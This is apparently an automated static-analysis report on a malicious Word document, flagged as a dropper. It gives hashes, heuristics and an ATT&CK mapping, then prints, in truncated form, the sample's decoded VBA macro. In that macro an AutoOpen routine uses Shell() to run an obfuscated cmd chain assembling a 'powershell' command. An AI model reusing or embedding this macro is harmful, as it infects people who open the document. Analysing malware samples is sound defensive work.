Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45a2c68a78c2df45…

MALICIOUS

Office (OLE)

109.2 KB Created: 2018-06-07 07:38:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: d7084acd6dc448a059d7769e64b250f0 SHA-1: 6aac6ab4deaf12ccb353fdd3d4d57893f483df37 SHA-256: 45a2c68a78c2df4595c02a5d2c3bf182cca91c91638bb53ff81b440743a4b032
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, as indicated by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. This function is likely used to execute a downloaded payload, a common technique for malware droppers. The ClamAV detection further confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6576077-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576077-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13882 bytes
SHA-256: 7ebcc2b7d7894108c50eb0717580ef4710fda78fd7a1aa66a849fe206312bd8b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CcpzIESwlQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Llqwlpidqi()
On Error Resume Next
RilMp = Tan(dwsZRS _
* Tan(hImzd * Int(iusHF * Sqr(34019) / wrzDtH + Fix(95730)) / 26170 * Round(72900 / Log(55346 - LEjOi) + 90643 - pDalw)) _
/ 12200 + Log(12486))
RXiZX = Tan(vtllwp _
* Tan(JUzvfO * Int(ZiQQzD * Sqr(29045) / WMstw + Fix(65440)) / 81048 * Round(49961 / Log(67711 - FrQKu) + 55005 - FXjicq)) _
/ 37009 + Log(83827))
Llqwlpidqi = iuhlLrzA + Shell(QkCKiz + Chr(uDJkT + vbKeyC + llstnqJbV) + DGRIv + BfFfiM + RkZNFOHurVD + VLfaGv + orAdFSHDlVt + tiJJIjXGAan + wovDX + dzijmc, 4373 - 4373)
mjHOb = Tan(RjXYt _
* Tan(swTuO * Int(aXVOnn * Sqr(66430) / jijtWZ + Fix(3441)) / 54161 * Round(91105 / Log(13533 - Ullaj) + 75827 - jiMZN)) _
/ 76598 + Log(26779))
End Function
Sub Autoopen()
On Error Resume Next
sUzYv = Tan(fjniA _
* Tan(BTBQCM * Int(tzpwmb * Sqr(31834) / EfHVs + Fix(60967)) / 30188 * Round(62878 / Log(64220 - XLwpBz) + 83778 - JVPcwW)) _
/ 2075 + Log(22285))
Llqwlpidqi
JDXMz = Tan(PbEjNH _
* Tan(lmUnfA * Int(EvrFCR * Sqr(90514) / bikUjL + Fix(11738)) / 56201 * Round(19048 / Log(31215 - jiNzRi) + 52375 - jcIIq)) _
/ 295 + Log(64821))
End Sub



Attribute VB_Name = "NMSJfkbzV"
Function DGRIv()
On Error Resume Next
cPraG = Tan(DmvcR _
* Tan(GcJRW * Int(cGJsB * Sqr(24073) / YkWWiv + Fix(31497)) / 19417 * Round(42265 / Log(47527 - ktqRQ) + 93587 - dwddX)) _
/ 38973 + Log(37352))
zBzcYS = "md jf" + "kHMIjziHk jjPvM" + "LiGRdALZt" + "ZPVMp jw" + "ZCtAJ &     " + "%^c^"
tlZJkO = Tan(hhYjQQ _
* Tan(BrkDEj * Int(fKqMZX * Sqr(30561) / vNCCf + Fix(2771)) / 59494 * Round(69792 / Log(23170 - qFMItj) + 62238 - wvmtT)) _
/ 29903 + Log(74191))
JsiNjaFK = "o^m^S^p" + "^E^c^%     %^" + "c^o^m^S" + "^p^E^"
NajzK = Tan(ORmKdN _
* Tan(fWGYPO * Int(PXQGjX * Sqr(51352) / dCtnQ + Fix(15667)) / 75923 * Round(7641 / Log(1807 - dzquW) + 66767 - TQQZf)) _
/ 40455 + Log(8617))
XJQZsnsE = "c^%" + "    " + " /V        " + " /c   " + "      " + "  set" + " %" + "KdI" + "iqpv"
LHqKc = Tan(mQuok _
* Tan(qwdsS * Int(JlOkV * Sqr(2623) / ANGJuz + Fix(63863)) / 78509 * Round(73054 / Log(10021 - ztYwr) + 67932 - FmRPWn)) _
/ 47053 + Log(13954))
oMVADiL = "OTmJdYzV%=Ck" + "vmPGkMu&" + "&se" + "t " + "%Iuqj" + "TsuIYk"
LSmal = Tan(ccEjGz _
* Tan(CcErcv * Int(hMufp * Sqr(29204) / RkrSl + Fix(76276)) / 46356 * Round(41870 / Log(42155 - fPHRvs) + 20839 - wOjoLi)) _
/ 22529 + Log(56065))
RYZvXpZqDk = "m%=p&&set %Xau" + "bvbwGN%=o^w" + "&&set %vzAkq" + "tSKVXcJuJ" + "W%=iGdMiRGLj" + "WR&&set" + " %bSha"
rwYGlW = Tan(LrNNU _
* Tan(ThGEM * Int(nGmUj * Sqr(4874) / AjcZMH + Fix(15946)) / 9192 * Round(62549 / Log(44205 - ttsiGE) + 59388 - IkvBhG)) _
/ 33535 + Log(97988))
rnlZkkaAc = "QwEZ%" + "=!" + "%IuqjTsuIYkm%!&" + "&set %wOuD" + "tvovrvicsq" + "S%=asGHaYH" + "&&set" + " %IWNPskhFD%=e^" + "r&"
cFioEs = Tan(tiSAG _
* Tan(HmKJL * Int(UFAhp * Sqr(73353) / IEivTv + Fix(15895)) / 35656 * Round(54918 / Log(51999 - IpBWoY) + 73131 - rvcJrX)) _
/ 90042 + Log(97217))
SrjXb = "&set" + " %NEQjNA" + "DLo%=!%Xa" + "ubvbwGN" + "%!&&set %AYVVJi" + "Xi" + "%=s&&" + "set %lAGAL" + "iqoBTbUwa"
kcXpCJ = Tan(RPmwFz _
* Tan(iLRAWR * Int(QbvLuw * Sqr(61515) / mXYwdi + Fix(731)) / 6830 * Round(6250 / Log(12559 - SEZlnY) + 88094 - wzaXY)) _
/ 64269 + Log(63674))
oFlqdUzTO = "T%=NGOfj" + "AdkVQNj&" + "&set %zPF" + "KYRjbTF%=he&&se" + "t %OaPslUTD" + "z%=" + "ll&&!%bShaQwEZ" + "%!!%NE" + "QjN" + "ADLo%!!%IWNPs"
DGRIv = zBzcYS + JsiNjaFK + XJQZsnsE + oMVADiL + RYZvXpZqDk + rnlZkkaAc + SrjXb + oFlqdUzTO
End Function
Function BfFfiM()
On Error Resume Next
AbdHL = Tan(VcPaI _
* Tan(LiIOt * Int(wsrqIm * Sqr(1476) / hwMzzP + Fix(92924)) / 27235 * Round(99798 / Log(53903 - wUPjw) + 42900 - QZpTp)) _
/ 22367 + Log(57298))
ZmpmlsEztSc = "khFD%!!%A" + "YVVJiXi%!!" + "%zPFK" + "YRjbTF%!!%"
iocKSr = Tan(O
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.